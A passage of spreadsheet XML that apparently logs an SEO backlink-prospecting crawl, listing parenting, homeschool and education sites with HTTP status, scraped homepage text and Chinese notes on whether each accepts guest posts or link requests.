        <x:v>500 Internal Server Error Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator at harrismithmarathonclub.co.za_www@harrismithmarathonclub.co.za to inform them of the time this error occurred, and the actions you performed just before this error. More information about this error may be available in the server error log.</x:v>
      </x:c>
      <x:c r="R260" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S260" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T260" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://harrismithmarathonclub.co.za
http://harrismithmarathonclub.co.za</x:v>
      </x:c>
    </x:row>
    <x:row r="261">
      <x:c r="A261" s="18" t="str">
        <x:v>260</x:v>
      </x:c>
      <x:c r="B261" s="19" t="str">
        <x:v>letstalkfaith.com</x:v>
      </x:c>
      <x:c r="C261" s="19" t="str">
        <x:v>https://letstalkfaith.com</x:v>
      </x:c>
      <x:c r="D261" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E261" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F261" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G261" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H261" s="19" t="str">
        <x:v>https://letstalkfaith.com/</x:v>
      </x:c>
      <x:c r="I261" s="19" t="str">
        <x:v>Attention Required! | Cloudflare</x:v>
      </x:c>
      <x:c r="J261" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K261" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L261" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M261" s="19" t="str">
        <x:v>https://letstalkfaith.com/</x:v>
      </x:c>
      <x:c r="N261" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O261" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P261" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q261" s="21" t="str">
        <x:v>Attention Required! | Cloudflare Please enable cookies. Sorry, you have been blocked You are unable to access letstalkfaith.com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a349b9984af38cac &amp;bull; Your IP: Cli</x:v>
      </x:c>
      <x:c r="R261" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S261" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T261" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://letstalkfaith.com</x:v>
      </x:c>
    </x:row>
    <x:row r="262">
      <x:c r="A262" s="18" t="str">
        <x:v>261</x:v>
      </x:c>
      <x:c r="B262" s="19" t="str">
        <x:v>happinessypunto.com</x:v>
      </x:c>
      <x:c r="C262" s="19" t="str">
        <x:v>https://happinessypunto.com</x:v>
      </x:c>
      <x:c r="D262" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E262" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F262" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G262" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H262" s="19" t="str">
        <x:v>https://happinessypunto.com/</x:v>
      </x:c>
      <x:c r="I262" s="19" t="str">
        <x:v>WADUK88 × HappinessYPunto | Kebahagiaan, Gaming &amp; Hiburan Digital Modern</x:v>
      </x:c>
      <x:c r="J262" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K262" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L262" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M262" s="19" t="str">
        <x:v>https://happinessypunto.com/</x:v>
      </x:c>
      <x:c r="N262" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O262" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P262" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q262" s="21" t="str">
        <x:v>WADUK88 × HappinessYPunto menghadirkan ruang digital modern 2026 yang memadukan kebahagiaan, informasi gaming, hiburan online, tren terbaru, dan pengalaman interaktif dalam satu platform yang praktis dan menarik. WADUK88 × HappinessYPunto | Kebahagiaan, Gaming &amp; Hiburan Digital Modern WADUK88 LOGIN DAFTAR WADUK88 × HappinessYPunto | Kebahagiaan, Gaming &amp; Hiburan Digital Modern Top artists WADUK 88 For You Funny T-Shirts Vintage Posters Music Posters Fresh Finds Fan Art WADUK88 GACOR All Clothing T-Shirts Hoodies &amp; Sweatshirts New Hats Socks Dresses Tank Tops WADUK88 LOGIN All Stickers Holographic Stickers Funny Stickers Car Stickers Bumper Stickers Water Bottle Stickers Cool Stickers WADUK88 Stickers Laptop Stickers Magnets Custom Stickers WADUK88 LINK All Phone Cases iPhone Cases New Samsung Galaxy WADUK88 DAFTAR All Wall Art Posters Photographic Prints Art Prints Tapestries Canvas Prints Framed Pri</x:v>
      </x:c>
      <x:c r="R262" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S262" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T262" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://happinessypunto.com</x:v>
      </x:c>
    </x:row>
    <x:row r="263">
      <x:c r="A263" s="18" t="str">
        <x:v>262</x:v>
      </x:c>
      <x:c r="B263" s="19" t="str">
        <x:v>gift-kids.org</x:v>
      </x:c>
      <x:c r="C263" s="19" t="str">
        <x:v>https://gift-kids.org</x:v>
      </x:c>
      <x:c r="D263" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E263" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F263" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G263" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H263" s="19" t="str">
        <x:v>https://gift-kids.org/</x:v>
      </x:c>
      <x:c r="I263" s="19" t="str"/>
      <x:c r="J263" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K263" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L263" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M263" s="19" t="str">
        <x:v>https://gift-kids.org/</x:v>
      </x:c>
      <x:c r="N263" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O263" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P263" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q263" s="21" t="str"/>
      <x:c r="R263" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S263" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T263" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://gift-kids.org</x:v>
      </x:c>
    </x:row>
    <x:row r="264">
      <x:c r="A264" s="18" t="str">
        <x:v>263</x:v>
      </x:c>
      <x:c r="B264" s="19" t="str">
        <x:v>busytoddler.com</x:v>
      </x:c>
      <x:c r="C264" s="19" t="str">
        <x:v>https://busytoddler.com</x:v>
      </x:c>
      <x:c r="D264" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E264" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F264" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G264" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H264" s="19" t="str">
        <x:v>https://busytoddler.com/</x:v>
      </x:c>
      <x:c r="I264" s="19" t="str">
        <x:v>Browse Hundreds of Busy Toddler Activities - Busy Toddler</x:v>
      </x:c>
      <x:c r="J264" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K264" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L264" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M264" s="19" t="str">
        <x:v>https://busytoddler.com/</x:v>
      </x:c>
      <x:c r="N264" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O264" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P264" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q264" s="21" t="str">
        <x:v>Find hundreds of Busy Toddler activities aimed to bring hands-on play back to early childhood, and support you in your parenting journey. Browse Hundreds of Busy Toddler Activities - Busy Toddler Skip to primary navigation Skip to main content Skip to footer Never miss a Busy Toddler Newsletter! Activities Play Learn Supplies Shop My account Search and hit enter Search Search Pinterest Instagram Facebook Activities Play Learn Supplies Shop My account Busy Toddler making it to naps, one activity at a time Search Search Pinterest Instagram Facebook Search and hit enter ACTIVITIES PARENTING SUPPLIES MEET SUSIE Browse Hundreds of Busy Toddler Activities BABY TABIES TODDLERS PRE-K BIG KIDS INDOOR FINE MOTOR ART SCIENCE OUTDOOR SENSORY MATH BATH TIME OUTDOOR ACTIVITIES Painted Box Cake Activity Construction Site Small World Chalk Pa</x:v>
      </x:c>
      <x:c r="R264" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S264" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T264" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://busytoddler.com</x:v>
      </x:c>
    </x:row>
    <x:row r="265">
      <x:c r="A265" s="18" t="str">
        <x:v>264</x:v>
      </x:c>
      <x:c r="B265" s="19" t="str">
        <x:v>twinkl.com.sa</x:v>
      </x:c>
      <x:c r="C265" s="19" t="str">
        <x:v>https://twinkl.com.sa</x:v>
      </x:c>
      <x:c r="D265" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E265" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F265" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G265" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H265" s="19" t="str">
        <x:v>https://www.twinkl.com.sa/</x:v>
      </x:c>
      <x:c r="I265" s="19" t="str"/>
      <x:c r="J265" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K265" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L265" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M265" s="19" t="str">
        <x:v>https://www.twinkl.com.sa/</x:v>
      </x:c>
      <x:c r="N265" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O265" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P265" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q265" s="21" t="str"/>
      <x:c r="R265" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S265" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T265" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://twinkl.com.sa</x:v>
      </x:c>
    </x:row>
    <x:row r="266">
      <x:c r="A266" s="18" t="str">
        <x:v>265</x:v>
      </x:c>
      <x:c r="B266" s="19" t="str">
        <x:v>homeschoolgiveaways.com</x:v>
      </x:c>
      <x:c r="C266" s="19" t="str">
        <x:v>https://homeschoolgiveaways.com</x:v>
      </x:c>
      <x:c r="D266" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E266" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="F266" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G266" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H266" s="19" t="str">
        <x:v>https://homeschoolgiveaways.com/</x:v>
      </x:c>
      <x:c r="I266" s="19" t="str">
        <x:v>Homeschool Resources | Freebies, Giveaways, Deals and More</x:v>
      </x:c>
      <x:c r="J266" s="19" t="str">
        <x:v>Homeschool 资源站</x:v>
      </x:c>
      <x:c r="K266" s="19" t="str">
        <x:v>高</x:v>
      </x:c>
      <x:c r="L266" s="19" t="str">
        <x:v>明确拒绝 guest/link</x:v>
      </x:c>
      <x:c r="M266" s="19" t="str">
        <x:v>https://homeschoolgiveaways.com/contact-2/</x:v>
      </x:c>
      <x:c r="N266" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O266" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P266" s="21" t="str">
        <x:v>FAQ 明确表示目前不接受 guest posts 或 link requests；广告和合作另计。</x:v>
      </x:c>
      <x:c r="Q266" s="21" t="str">
        <x:v>Get thousands of homeschool resources, printables, coloring pages, worksheets and more with roundups, giveaways, freebies and bundle deals. Homeschool Resources | Freebies, Giveaways, Deals and More Skip to content About Contact Over 6,200 homeschool resources and growing! Account/Log in Homeschool 101 Fun Activities Subjects Seasonal Holidays Seasons Freebies ALL ACCESS Library Bible Freebies Fine Arts Freebies Fun Activities Freebies History Freebies Holidays &amp; Seasons Freebies Language Arts Freebies Math Freebies Science Freebies Technology Freebies Template Freebies Subscriber Hub Shop Printables Homeschool Resources We help busy parents save time, reduce stress, and stretch their homeschool dollars with free and low-cost homeschool resources. Shop Printables Subscriber Freebie of the Week We giveaway a different freebie eve</x:v>
      </x:c>
      <x:c r="R266" s="19" t="str">
        <x:v>重点站点人工核验</x:v>
      </x:c>
      <x:c r="S266" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T266" s="21" t="str">
        <x:v>不列入免费外链批次。 | 请求: https://homeschoolgiveaways.com</x:v>
      </x:c>
    </x:row>
    <x:row r="267">
      <x:c r="A267" s="18" t="str">
        <x:v>266</x:v>
      </x:c>
      <x:c r="B267" s="19" t="str">
        <x:v>thetimes365.com</x:v>
      </x:c>
      <x:c r="C267" s="19" t="str">
        <x:v>https://thetimes365.com</x:v>
      </x:c>
      <x:c r="D267" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E267" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F267" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G267" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H267" s="19" t="str">
        <x:v>https://thetimes365.com/</x:v>
      </x:c>
      <x:c r="I267" s="19" t="str">
        <x:v>thetimes365.com</x:v>
      </x:c>
      <x:c r="J267" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K267" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L267" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M267" s="19" t="str">
        <x:v>https://thetimes365.com/</x:v>
      </x:c>
      <x:c r="N267" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O267" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P267" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q267" s="21" t="str">
        <x:v>thetimes365.com Facebook Instagram Linkedin Twitter Sign in Home News Politics Business Technology Lifestyle Fashion Markets Crypto Personal Finance Entertainment Music Gaming Kids entertainment Sport More Food Travel Health Culture Sign in Welcome! Log into your account your username your password Forgot your password? Password recovery Recover your password your email Search Sign in Welcome! Log into your account your username your password Forgot your password? Get help Password recovery Recover your password your email A password will be e-mailed to you. Sign in / Join Wednesday, August 26, 2026 About Us Privacy Policy Contact Us Sign in / Join Facebook Instagram Linkedin Twitter Home Ne</x:v>
      </x:c>
      <x:c r="R267" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S267" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T267" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://thetimes365.com</x:v>
      </x:c>
    </x:row>
    <x:row r="268">
      <x:c r="A268" s="18" t="str">
        <x:v>267</x:v>
      </x:c>
      <x:c r="B268" s="19" t="str">
        <x:v>mouthsofmums.com.au</x:v>
      </x:c>
      <x:c r="C268" s="19" t="str">
        <x:v>https://mouthsofmums.com.au</x:v>
      </x:c>
      <x:c r="D268" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E268" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F268" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G268" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H268" s="19" t="str">
        <x:v>https://mouthsofmums.com.au/</x:v>
      </x:c>
      <x:c r="I268" s="19" t="str">
        <x:v>Mouths of Mums - Reviews, Comps &amp; News for Mums</x:v>
      </x:c>
      <x:c r="J268" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K268" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L268" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M268" s="19" t="str">
        <x:v>https://mouthsofmums.com.au/</x:v>
      </x:c>
      <x:c r="N268" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O268" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P268" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q268" s="21" t="str">
        <x:v>Read product reviews and opinions by mums. Join to receive free samples, review products, get exclusive promotions and lots of motherhood hints and tips. Mouths of Mums - Reviews, Comps &amp; News for Mums Toggle Search Toggle Navigation Follow MoMs on Instagram Like MoMs on Facebook MoMs on Pinterest MoMs YouTube Channel Follow MoMs on TikTok Update your profile Search MoMs Reviews Shopping Win Articles Rate It Recipes Rewards Real Stories Forum Reviews Shopping Win Articles Rate It Recipes Rewards Real Stories Forum Hello! Join Login Discover More At IGA READ REVIEWS “My Floor Has Never Been So Clean”: The Mop Th... READ NOW Vileda Easy Wring &amp; Clean TURBO Mop &amp; Bu... READ REVIEWS Winter With IGA READ REVIEWS Real Value At IGA READ REVIEWS JOIN NOW CREATING ACCOUNTS… All the latest reviews , recipes, news and competitions &amp;hellip; Read reviews </x:v>
      </x:c>
      <x:c r="R268" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S268" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T268" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://mouthsofmums.com.au</x:v>
      </x:c>
    </x:row>
    <x:row r="269">
      <x:c r="A269" s="18" t="str">
        <x:v>268</x:v>
      </x:c>
      <x:c r="B269" s="19" t="str">
        <x:v>kidzonemuseum.org</x:v>
      </x:c>
      <x:c r="C269" s="19" t="str">
        <x:v>https://kidzonemuseum.org</x:v>
      </x:c>
      <x:c r="D269" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E269" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F269" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G269" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H269" s="19" t="str">
        <x:v>https://kidzonemuseum.org/</x:v>
      </x:c>
      <x:c r="I269" s="19" t="str">
        <x:v>Error 403 Forbidden</x:v>
      </x:c>
      <x:c r="J269" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K269" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L269" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M269" s="19" t="str">
        <x:v>https://kidzonemuseum.org/</x:v>
      </x:c>
      <x:c r="N269" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O269" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P269" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q269" s="21" t="str">
        <x:v>Error 403 Forbidden 403 Forbidden</x:v>
      </x:c>
      <x:c r="R269" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S269" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T269" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://kidzonemuseum.org</x:v>
      </x:c>
    </x:row>
    <x:row r="270">
      <x:c r="A270" s="18" t="str">
        <x:v>269</x:v>
      </x:c>
      <x:c r="B270" s="19" t="str">
        <x:v>mommyhoodlife.com</x:v>
      </x:c>
      <x:c r="C270" s="19" t="str">
        <x:v>https://mommyhoodlife.com</x:v>
      </x:c>
      <x:c r="D270" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E270" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F270" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G270" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H270" s="19" t="str">
        <x:v>https://mommyhoodlife.com/</x:v>
      </x:c>
      <x:c r="I270" s="19" t="str">
        <x:v>The Mommyhood Life Parenting and Florida Lifestyle Blog Updates - The Mommyhood Life</x:v>
      </x:c>
      <x:c r="J270" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K270" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L270" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M270" s="19" t="str">
        <x:v>https://mommyhoodlife.com/</x:v>
      </x:c>
      <x:c r="N270" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O270" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P270" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q270" s="21" t="str">
        <x:v>The Mommyhood Life Parenting and Florida Lifestyle Blog Updates - The Mommyhood Life Skip to content Trending Post : The Best Air Fryer Recipes Home 🏠 Blog 📝 About 🎀 Welcome! Let’s Work Together! Food Breakfast Appetizers and Snacks Lunch and Dinner Recipes Desserts and Sweets Drinks Cocktails Air Fryer Recipes Fun Crafts Kid’s Activities Movies &amp; TV Family Parenting Pets Travel Travel Tips Explore Florida Disney World Explore New England Great Wolf Lodge Party Lifestyle Home Self Care Budget Fun Finds Holidays Halloween Thanksgiving Christmas Valentine’s Day St Patrick’s Day Easter Mother’s Day Father’s Day 4th of July Tampa Bay Printables The Mommyhood Life Explore Florida | Tampa Bay 1</x:v>
      </x:c>
      <x:c r="R270" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S270" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T270" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://mommyhoodlife.com</x:v>
      </x:c>
    </x:row>
    <x:row r="271">
      <x:c r="A271" s="18" t="str">
        <x:v>270</x:v>
      </x:c>
      <x:c r="B271" s="19" t="str">
        <x:v>flyingballgames.com</x:v>
      </x:c>
      <x:c r="C271" s="19" t="str">
        <x:v>https://flyingballgames.com</x:v>
      </x:c>
      <x:c r="D271" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E271" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F271" s="20"/>
      <x:c r="G271" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H271" s="19" t="str"/>
      <x:c r="I271" s="19" t="str"/>
      <x:c r="J271" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K271" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L271" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M271" s="19" t="str">
        <x:v>https://flyingballgames.com</x:v>
      </x:c>
      <x:c r="N271" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O271" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P271" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q271" s="21" t="str"/>
      <x:c r="R271" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S271" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T271" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://flyingballgames.com
http://flyingballgames.com</x:v>
      </x:c>
    </x:row>
    <x:row r="272">
      <x:c r="A272" s="18" t="str">
        <x:v>271</x:v>
      </x:c>
      <x:c r="B272" s="19" t="str">
        <x:v>goodpods.com</x:v>
      </x:c>
      <x:c r="C272" s="19" t="str">
        <x:v>https://goodpods.com</x:v>
      </x:c>
      <x:c r="D272" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E272" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F272" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G272" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H272" s="19" t="str">
        <x:v>https://goodpods.com/</x:v>
      </x:c>
      <x:c r="I272" s="19" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="J272" s="19" t="str">
        <x:v>平台/个人发布平台</x:v>
      </x:c>
      <x:c r="K272" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L272" s="19" t="str">
        <x:v>平台自建内容</x:v>
      </x:c>
      <x:c r="M272" s="19" t="str">
        <x:v>https://goodpods.com/</x:v>
      </x:c>
      <x:c r="N272" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O272" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P272" s="21" t="str">
        <x:v>这是内容发布或个人资料平台，不是自然获得的编辑型外链目标。</x:v>
      </x:c>
      <x:c r="Q272" s="21" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="R272" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S272" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T272" s="21" t="str">
        <x:v>不能把平台自身的用户页面当成高质量目录外链。 | 请求: https://goodpods.com</x:v>
      </x:c>
    </x:row>
    <x:row r="273">
      <x:c r="A273" s="18" t="str">
        <x:v>272</x:v>
      </x:c>
      <x:c r="B273" s="19" t="str">
        <x:v>natashalh.com</x:v>
      </x:c>
      <x:c r="C273" s="19" t="str">
        <x:v>https://natashalh.com</x:v>
      </x:c>
      <x:c r="D273" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E273" s="20" t="str">
        <x:v>3495</x:v>
      </x:c>
      <x:c r="F273" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G273" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H273" s="19" t="str">
        <x:v>https://natashalh.com/</x:v>
      </x:c>
      <x:c r="I273" s="19" t="str">
        <x:v>Making mom life easier - The Artisan Life</x:v>
      </x:c>
      <x:c r="J273" s="19" t="str">
        <x:v>教育/手工博客</x:v>
      </x:c>
      <x:c r="K273" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L273" s="19" t="str">
        <x:v>明确拒绝链接请求</x:v>
      </x:c>
      <x:c r="M273" s="19" t="str">
        <x:v>https://natashalh.com/winter-color-by-sight-word-worksheets/</x:v>
      </x:c>
      <x:c r="N273" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O273" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P273" s="21" t="str">
        <x:v>页面明确表示不接受 guest posts，也不回复未经请求的 guest/link 请求。</x:v>
      </x:c>
      <x:c r="Q273" s="21" t="str">
        <x:v>Making mom life easier - The Artisan Life Skip to main content Skip to primary sidebar The Artisan Life Dot Marker Pages Learning Center Free Printables Free Printables for Summer DIY Squishies dramatic play printables Printable Calendars Fall printables Winter Printables Valentine's Day printables St. Patrick's Day printables Earth Day Easter printables Mother's Day Thanksgiving Printables Christmas Printables Preschool + K Alphabet Tracing Worksheets Dot Marker Pages Cut &amp; Paste Crafts Preschool Math Fine Motor Practice Pages Spanish Preschool Pages Coloring Pages Recipes Healthy dessert recipes main dish recipes Side dish recipes sourdough recipes Drink Recipes Gardening Wood Working Timb</x:v>
      </x:c>
      <x:c r="R273" s="19" t="str">
        <x:v>重点站点人工核验</x:v>
      </x:c>
      <x:c r="S273" s="22" t="n">
